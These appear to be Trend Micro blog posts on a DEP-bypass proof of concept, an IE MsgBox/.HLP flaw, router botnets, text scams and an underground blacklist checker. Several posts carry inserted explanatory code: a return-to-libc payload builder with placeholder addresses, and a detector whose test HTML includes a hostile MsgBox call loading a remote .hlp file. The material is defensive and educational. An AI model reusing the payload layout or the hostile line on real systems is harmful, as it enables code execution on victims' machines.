Mar 3
2:54 am (UTC-7)   |    by Carolyn Guevarra (Technical Communications)

Another Proof-of-Concept (POC) Revealed

The changing threat landscape has brought more sophisticated Web threats and left users asking for better security features in the systems and applications they use. This has pushed Microsoft to build defenses into Windows such as Data Execution Prevention (DEP) and Address Space Layout Randomization (ASLR).

DEP and ASLR are exploit mitigations that Microsoft introduced in Windows XP SP2 and Windows Vista, respectively, and that should ideally keep exploit code from running. DEP prevents the CPU from executing code out of memory pages marked non-executable, such as the stack and heap, which is where injected shellcode normally lands. ASLR randomizes where executables, libraries, the stack and the heap are placed in memory, so that an exploit cannot rely on a fixed address for the code or data it needs. But what if these mechanisms are not so secure after all?

This is what Berend-Jan Wever, aka Skylined (the security researcher who disclosed the heap-spraying technique), set out to show when he published a new exploit technique that bypasses DEP on systems where ASLR is not in effect. In his full disclosure, Wever describes how to get around DEP with a return-to-libc attack: instead of executing code of his own, the attacker redirects execution into code that is already present and executable, namely the exploited application's own code or library functions, and arranges the stack so that this code runs with attacker-chosen arguments. Because that only works when the attacker knows where that code lives, the technique depends on ASLR being absent or disabled.
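To make the mechanics concrete, here is an added example (not Skylined's code and not taken from his disclosure) that builds the classic 32-bit return-to-libc stack layout for a textbook stack buffer overflow. The addresses are placeholders chosen for the example, not real library addresses, and the frame layout assumes the usual x86 convention of a local buffer sitting just below the saved frame pointer.

```python
# Added example (not Skylined's code): the layout of a classic 32-bit
# return-to-libc payload and why it sidesteps DEP. Everything here is
# constructed for illustration: the addresses are placeholders, and the
# target is a textbook stack buffer overflow, not the IE bug the post refers to.
import struct


def build_ret2libc_payload(buf_size, target_fn, fake_return, args):
    """Bytes that overwrite the saved return address of a function whose local
    buffer sits `buf_size` bytes below the saved frame pointer.

    Stack after the overflow (32-bit, addresses increase to the right):

        [ filler ... ][ saved EBP ][ target_fn ][ fake_return ][ arg0 ][ arg1 ] ...

    When the vulnerable function executes RET it pops `target_fn` into EIP, so
    the CPU fetches instructions from code that is already mapped executable
    (system(), VirtualProtect(), ...). No attacker-supplied bytes are ever
    executed, which is why marking the stack and heap non-executable (DEP)
    does not stop it. `target_fn` then sees `fake_return` as its own return
    address and `args` as its parameters, exactly as if it had been called.
    """
    filler = b"A" * buf_size + b"B" * 4                  # local buffer + saved EBP
    frame = struct.pack("<II", target_fn, fake_return)  # x86 is little-endian
    frame += b"".join(struct.pack("<I", a) for a in args)
    return filler + frame


def saved_eip_offset(buf_size):
    """Byte offset of the saved return address for the frame layout above."""
    return buf_size + 4


def read_word(payload, offset):
    """Read back one little-endian 32-bit value from the payload."""
    return struct.unpack_from("<I", payload, offset)[0]


def has_nul_bytes(payload):
    """strcpy()-style overflows stop at the first 0x00, so a payload that
    contains one has to be delivered by a length-based copy instead."""
    return b"\x00" in payload


# Placeholder addresses (constructed, not real library addresses). A real
# chain needs them to be identical on every victim, which is exactly what
# ASLR takes away and why the technique targets systems without it.
SYSTEM_ADDR = 0x7C8628C7   # hypothetical: the library function to return into
EXIT_ADDR = 0x7C81CAFA     # hypothetical: where that function should "return"
ARG_ADDR = 0x7FFD1234      # hypothetical: pointer to the argument string

if __name__ == "__main__":
    payload = build_ret2libc_payload(64, SYSTEM_ADDR, EXIT_ADDR, [ARG_ADDR])
    print(len(payload), "bytes; saved EIP ->",
          hex(read_word(payload, saved_eip_offset(64))))
```

On Windows the function returned into is typically one that changes page permissions, such as VirtualProtect or VirtualAlloc, so that a sprayed heap region becomes executable and the chain can then "return" into the shellcode there. The point the example makes is the one the post relies on: every value in the frame is an absolute address, so the payload only works while those addresses are the same on every victim, which is precisely what ASLR breaks.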

Possibilities Explored

Although these features make code execution harder to achieve, they are not perfect and can be bypassed, as Wever's exploit code shows. The POC targets an already-patched vulnerability in Internet Explorer (IE), but the technique itself is reusable and may pave the way for new exploits that defeat DEP.

As Trend Micro researcher Rajiv Motwani puts it, "history could repeat itself. After Wever released his heap-spraying exploit codes in 2005, a lot of new exploits started using that technique. It would thus not be far-fetched that the release of this new POC could lead to the same scenario—new exploits could start using return-to-libc to achieve DEP bypass."

Furthermore, the technique defeats DEP alone: it needs predictable addresses, so it is most reliable on Windows XP, where DEP exists (since SP2) but ASLR does not. Only Windows Vista and later enable ASLR by default, so it is on the still-large XP installed base that we can expect this technique to yield more reliable code execution.

Thoughts on Public Disclosures

Given the increasing number of POCs that have gone public, responsible disclosure deserves some thought. Trend Micro global director for education David Perry notes that there seems to be a lot of disclosure but little response to the exploit. Public disclosures currently act as double-edged swords that both contribute to and complicate the threat landscape.

On one hand, disclosures raise public awareness and push developers to act quickly. On the other hand, putting such critical information in the hands of the public can lead to significant exploits, as the most recent IE zero-day vulnerability showed.

While exploits based on this POC have yet to be seen in the wild, Trend Micro Deep Security™ already shields users from potential future exploits. Trend Micro OfficeScan™ users with the Intrusion Defense Firewall (IDF) plug-in are also protected from this attack if their systems are updated with the latest IDF filters.

Additional text by Ria Rivera


 


Mar 3
2:49 am (UTC-7)   |    by Maxim Goncharov (Advanced Threats Researcher)

As the security industry evolves, underground cybercriminals keep looking for ways to counter the technology put in their way. I recently found that the bad guys have begun offering services that track whether domain names have been blacklisted by reputation checks. The number of "businesses" offering this type of service is growing, and the service itself has now become semi-automated.

The service takes a customer's list of domain names and checks each one against several Web reputation databases. The most recent service I studied is hosted at www.{BLOCKED}ervice.net, which offers to check a customer's list of domains regularly for blacklisting against Google BlackList (Firefox), ZeuS Tracker, MalwareDomainList.com, SpamHaus, and others. The monthly fee is currently around US$30 for 100 domains.

The service's announcement (a screenshot in the original post) translates to:

Zeus TRACKER
Added checking on ZEUS TRACKER
Join now!
JABBER BOT!
Now clients of our service can use a Jabber bot, which can help with code crypting and check whether a domain is blacklisted; check your domains in real time for blacklisting.
Join! It's easy!
Added API!
Now clients of our service can use our algorithms via the API.
This means you can now integrate the algorithms into your software products.

The service offers a Web-based interface for manual site-by-site checks as well as a bulk check mechanism. It exposes an application programming interface (API) and uses Jabber as its communication protocol. Note that this is not the site's main business; it still prioritizes bulk JavaScript obfuscation.
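The same bulk check is just as useful from the other side of the fence: a domain owner who wants to know whether any of their names has landed on a blocklist. The following is an added example, not code from this post and not the underground service's code, of that defender-side check. The feed contents are constructed samples in the two formats such sources commonly publish (hosts-file lines and bare domain lists), not live data, and the feed names are placeholders.

```python
# Added example, not code from the post or from the underground service it
# describes: the defender-side version of the same bulk check, i.e. "have any
# of my domains landed on a blocklist?". The feed contents below are
# constructed samples in the two formats such sources commonly publish
# (hosts-file lines and bare domains); they are not live data.

FEEDS = {
    "hosts-style feed (constructed)": """
        # comment lines and the localhost entry are ignored
        127.0.0.1  localhost
        127.0.0.1  evil-downloads.example
        127.0.0.1  cdn.badstuff.example   # trailing comment
    """,
    "domain-list feed (constructed)": """
        phish-login.example
        badstuff.example
    """,
}


def parse_feed(text):
    """Return the set of listed domains, accepting both 'IP domain' hosts
    lines and bare-domain lines; comments and blank lines are skipped and
    names are normalised to lowercase without a trailing dot."""
    listed = set()
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        name = fields[1] if len(fields) >= 2 else fields[0]
        name = name.lower().rstrip(".")
        if name != "localhost":
            listed.add(name)
    return listed


def candidate_names(domain):
    """The domain itself and each parent down to the registered domain,
    e.g. www.cdn.badstuff.example -> [www.cdn.badstuff.example,
    cdn.badstuff.example, badstuff.example]. A listing of the parent
    covers every host beneath it, so parents must be checked too."""
    labels = domain.lower().rstrip(".").split(".")
    if len(labels) < 2:
        return [labels[0]]
    return [".".join(labels[i:]) for i in range(len(labels) - 1)]


def check_domains(domains, feeds=FEEDS):
    """Map each domain to the list of (feed, matched name) pairs that flag it."""
    parsed = {feed: parse_feed(text) for feed, text in feeds.items()}
    report = {}
    for domain in domains:
        hits = []
        for feed, listed in parsed.items():
            for name in candidate_names(domain):
                if name in listed:
                    hits.append((feed, name))
                    break           # one hit per feed is enough
        report[domain] = hits
    return report


if __name__ == "__main__":
    queries = ["www.cdn.badstuff.example", "Phish-Login.example.", "clean.example"]
    for domain, hits in check_domains(queries).items():
        print(domain, "->", hits or "not listed")
```

The parent-domain walk is the part that is easy to get wrong: a feed that lists badstuff.example has implicitly blocked every host under it, so a naive exact-match check would report www.cdn.badstuff.example as clean.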

These services demonstrate how adept the cyber underground is at turning new technologies and resources to its advantage. The security industry has finally recognized the need for reputation checks and deployed them, and the bad guys have already come along and misused the same technology to make even more money.

Trend Micro protects users from potential attacks via the Smart Protection Network™, which blocks access to malicious URLs via the Web reputation service and detects related malware via the file reputation service.

 


Mar 2
6:15 am (UTC-7)   |    by Florabel Baetiong (Anti-spam Research Engineer)


Text scams are becoming common again with the forthcoming Philippine national and local elections, as political campaigns turn to mass text messaging for faster mobilization. Earlier, I received a text message with the following content:

May GOD bountifuly bles u & ur family. Have a blissful day Fr Frends of UNI-MAD Party List, United Movement Against Drugs no.181′Luv ur famly, say NO 2 drugs.

According to the Philippine National Statistical Coordination Board, the National Telecommunications Commission (NTC) reported an average of 250 million text messages sent daily in 2005. A more recent study reported that this figure had more than doubled by 2009, alongside growth in the number of mobile phone users to over 63 million.

Numbers like these, in a country known as the "text capital of the world," set the stage for the proliferation of text scams such as the one in the following message:

CONGRATULATIONS!!!Your # WON TOYOTA AVANZA car w/ 300thou via electronic last Dec.21,2009. For details,please call now Rene Samonte. of Phil. Info. Center on this #.

Similar text scams have occurred before, so be wary of unsolicited messages, especially ones that announce a prize and ask you to call a number, before you fall prey to one.

 


Mar 2
6:14 am (UTC-7)   |    by Roderick Ordoñez (Technical Communications)

Asking for help in Windows could lead to more trouble.

A newly discovered vulnerability in Internet Explorer (IE) leverages the ability of a VBScript message box to reference a .HLP file (the legacy Windows Help file format), which could give a remote attacker the ability to run arbitrary code on an affected system.

VBScript's MsgBox function, which displays a message box, uses the following syntax:

MsgBox(prompt[,buttons][,title][,helpfile,context])

The fourth argument, helpfile, names the help file opened when the user presses F1 while the message box is displayed. If that argument points to a specially crafted .HLP file supplied by the attacker, remote users can run arbitrary code on an affected system. Triggering the vulnerability takes some user interaction: the victim has to be lured to the page hosting the exploit and then press F1 when the message box appears.
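Because a legitimate web page has no reason to hand MsgBox a help file at all, the helpfile argument is a usable content signature. The following added example (not Microsoft's code and not Trend Micro's IDF rule) scans HTML for VBScript MsgBox calls that pass it, and classifies the path. The HTML sample is constructed for the demonstration, and the UNC host in it is a documentation-range placeholder, not a real server.

```python
# Added example (not Microsoft's or Trend Micro's code): a content check that
# flags VBScript MsgBox calls in a web page which supply the optional
# helpfile argument, the argument the post describes being abused. The HTML
# sample is constructed for the demonstration; the UNC path in it is a
# placeholder, not a real host.
import re

# <script language="vbscript"> or <script type="text/vbscript">, any case
SCRIPT_RE = re.compile(
    r"<script\b[^>]*\b(?:language\s*=\s*['\"]?vbscript|type\s*=\s*['\"]?text/vbscript)"
    r"[^>]*>(.*?)</script>",
    re.IGNORECASE | re.DOTALL,
)
# MsgBox used either as a statement (no parentheses) or as a function call
CALL_RE = re.compile(r"\bMsgBox\s*\(?(.*)$", re.IGNORECASE)


def split_args(text):
    """Split a VBScript argument list on commas that are outside double
    quotes, stopping at the parenthesis that closes the call (if any)."""
    args, current, in_string, depth = [], [], False, 0
    for ch in text:
        if ch == '"':
            in_string = not in_string
        elif not in_string and ch == "(":
            depth += 1
        elif not in_string and ch == ")":
            if depth == 0:
                break
            depth -= 1
        elif not in_string and ch == ",":
            args.append("".join(current).strip())
            current = []
            continue
        current.append(ch)
    args.append("".join(current).strip())
    return args


def find_msgbox_helpfiles(html):
    """Return (helpfile, context) for each MsgBox call inside a VBScript block
    that passes the fourth (helpfile) argument. A web page has no legitimate
    reason to hand MsgBox a help file, so any value here is worth a look."""
    findings = []
    for block in SCRIPT_RE.findall(html):
        for line in block.splitlines():
            match = CALL_RE.search(line)
            if not match:
                continue
            args = split_args(match.group(1))
            if len(args) >= 4 and args[3]:
                helpfile = args[3].strip('"')
                context = args[4] if len(args) > 4 else ""
                findings.append((helpfile, context))
    return findings


def classify_helpfile(path):
    """'remote-hlp' for a .hlp reached over UNC or a URL, 'local-hlp' for any
    other .hlp path, 'other' for anything that is not a .hlp file."""
    p = path.strip().strip('"').lower()
    if not p.endswith(".hlp"):
        return "other"
    if p.startswith("\\\\") or "://" in p:
        return "remote-hlp"
    return "local-hlp"


# Constructed sample: one hostile call, one benign call, one non-VBScript block.
SAMPLE_HTML = r'''<html><body>
<script language="VBScript">
MsgBox "Press F1 for help", 0, "Help", "\\203.0.113.5\share\evil.hlp", 1
</script>
<script language="vbscript">
Dim answer: answer = MsgBox("Hello, world", 0, "Greeting")
</script>
<script type="text/javascript">alert("not vbscript, 1, 2, 3, 4");</script>
</body></html>'''

if __name__ == "__main__":
    for helpfile, context in find_msgbox_helpfiles(SAMPLE_HTML):
        print(classify_helpfile(helpfile), helpfile, "context", context)
```

The argument splitter matters more than the regex: a prompt string such as "Hello, world" contains a comma, and a naive split on commas would shift every later argument by one and either miss the help file or misreport it.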

The exploit does not affect all versions of Windows. Systems running Windows 2000, Windows XP, and Windows Server 2003 are vulnerable; those running Windows Vista, Server 2008, Server 2008 R2, and Windows 7 are not.

Microsoft is already aware of the issue and has issued the following statement:

Our teams are working to address the issue and once we complete our investigation, we will take appropriate action to protect customers. This may include releasing an update out of band. We will provide further updates as they become available.

Microsoft also released a security advisory that details several workarounds for the vulnerability. For users, the most important advice is simple: do not press the F1 key when prompted to by a website.

Until the official patch is released, Trend Micro Deep Security™ can help shield users from this vulnerability, and Trend Micro OfficeScan™ users with the Intrusion Defense Firewall (IDF) plug-in are also protected from this attack if their systems are updated with the IDF10-009 release and rule number IDF1004019.

 


Mar 1
9:02 pm (UTC-7)   |    by Carolyn Guevarra (Technical Communications)

Just when you think old-school network bots are dead, a group of cybercriminals revives them from their grave in the name of Chuck Norris. Dubbed the "Chuck Norris botnet" after the Italian comment in its source code, in nome di Chuck Norris (translation: "in the name of Chuck Norris"), this botnet infects vulnerable DSL modems and routers with a worm that Trend Micro detects as WORM_IRCBOT.ABJ.

The worm tries to gain access to a target router by brute-forcing the router's administration password. It may also spread across the local network by exploiting a known Microsoft vulnerability, MS03-039 (Buffer Overrun in RPCSS Service). Either way, every user connected to the same network or router is at risk of infection.
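Password guessing against a router's administration interface leaves a recognisable trail in the device's log: a burst of failed logins from one source, sometimes followed by a success. The following is an added example, not part of this post and not the worm's code, of a small detector for that pattern. It runs over constructed syslog-style lines in a generic "login failed for <user> from <ip>" format, not any vendor's exact wording, and the IP addresses are documentation-range placeholders.

```python
# Added example, not part of the post and not the worm's code: a small
# detector for the password-guessing behaviour described above, run over
# constructed router syslog lines. The line format is a generic
# "login failed for <user> from <ip>" message, not any vendor's exact text.
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

LINE_RE = re.compile(
    r"^(?P<ts>\S+) router (?P<result>login failed|login ok) "
    r"for (?P<user>\S+) from (?P<ip>[\d.]+)$"
)


def parse_line(line):
    """One log line -> dict, or None for lines in another format."""
    match = LINE_RE.match(line.strip())
    if not match:
        return None
    return {
        "ts": datetime.fromisoformat(match["ts"]),
        "ok": match["result"] == "login ok",
        "user": match["user"],
        "ip": match["ip"],
    }


def detect_bruteforce(lines, threshold=5, window=timedelta(seconds=60)):
    """Flag a source IP once it produces `threshold` failed logins inside any
    `window`-long span, and separately record a success from an IP that was
    already flagged: that is the sign the guessing worked and the device's
    configuration is now in the attacker's hands.

    Returns (flagged_ips, compromised) where compromised holds (ip, user)."""
    recent_failures = defaultdict(deque)   # ip -> timestamps inside the window
    flagged, compromised = set(), set()
    for line in lines:
        event = parse_line(line)
        if event is None:
            continue
        if event["ok"]:
            if event["ip"] in flagged:
                compromised.add((event["ip"], event["user"]))
            continue
        fails = recent_failures[event["ip"]]
        fails.append(event["ts"])
        while fails and event["ts"] - fails[0] > window:
            fails.popleft()                  # slide the window forward
        if len(fails) >= threshold:
            flagged.add(event["ip"])
    return flagged, compromised


# Constructed sample log: one guessing burst that succeeds, one slow source
# that stays under the threshold, one ordinary login.
SAMPLE_LOG = """\
2010-03-01T09:00:00 router login failed for admin from 192.0.2.77
2010-03-01T09:00:03 router login failed for admin from 192.0.2.77
2010-03-01T09:00:05 router login ok for joe from 10.0.0.2
2010-03-01T09:00:06 router login failed for admin from 192.0.2.77
2010-03-01T09:00:09 router login failed for root from 192.0.2.77
2010-03-01T09:00:12 router login failed for admin from 192.0.2.77
2010-03-01T09:00:40 router login failed for admin from 198.51.100.9
2010-03-01T09:00:45 router login ok for admin from 192.0.2.77
2010-03-01T09:05:00 router login failed for admin from 198.51.100.9
"""

if __name__ == "__main__":
    flagged, compromised = detect_bruteforce(SAMPLE_LOG.splitlines())
    print("brute-force sources:", sorted(flagged))
    print("likely compromised:", sorted(compromised))
```

The sliding window is what separates a worm hammering the login from an administrator who mistypes a password twice in an afternoon; tune `threshold` and `window` to the device, and treat a success after a flagged burst as an incident rather than a mere alert.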

The worm also has backdoor capabilities that let attackers execute remote commands on affected systems, including downloading and executing other malware and launching denial-of-service (DoS) attacks against other systems. Ultimately, its main goal is still profit: it steals personally identifiable information (PII) and credentials for certain websites, particularly online banking sites.

Infecting routers is unusual for bots of this kind, which usually infect computers, but this is not the first time bots have used modems and routers as a propagation platform. Trend Micro has reported such attacks in the past in relation to other threat families such as ZLOB, RBOT, and QHOST.

For more information on how old-school network bots work, you may read Trend Micro’s white paper, “SDBOT IRC Botnet Continues to Make Waves.”

Users are strongly advised to keep their systems updated with the latest patches and to replace default router and modem passwords with strong ones, since the worm gets in by guessing them. Computers that may already be compromised should be isolated from the network immediately and cleaned of the bot.

Trend Micro™ Smart Protection Network™ already protects product users from this threat by detecting and preventing the file’s execution on affected systems via the file reputation service.

Non-Trend Micro product users can use free tools like RUBotted, which monitors a computer for suspicious activity and regularly checks with an online service to identify behaviors associated with bots. When it finds a potential infection, it prompts the user to scan and clean the computer.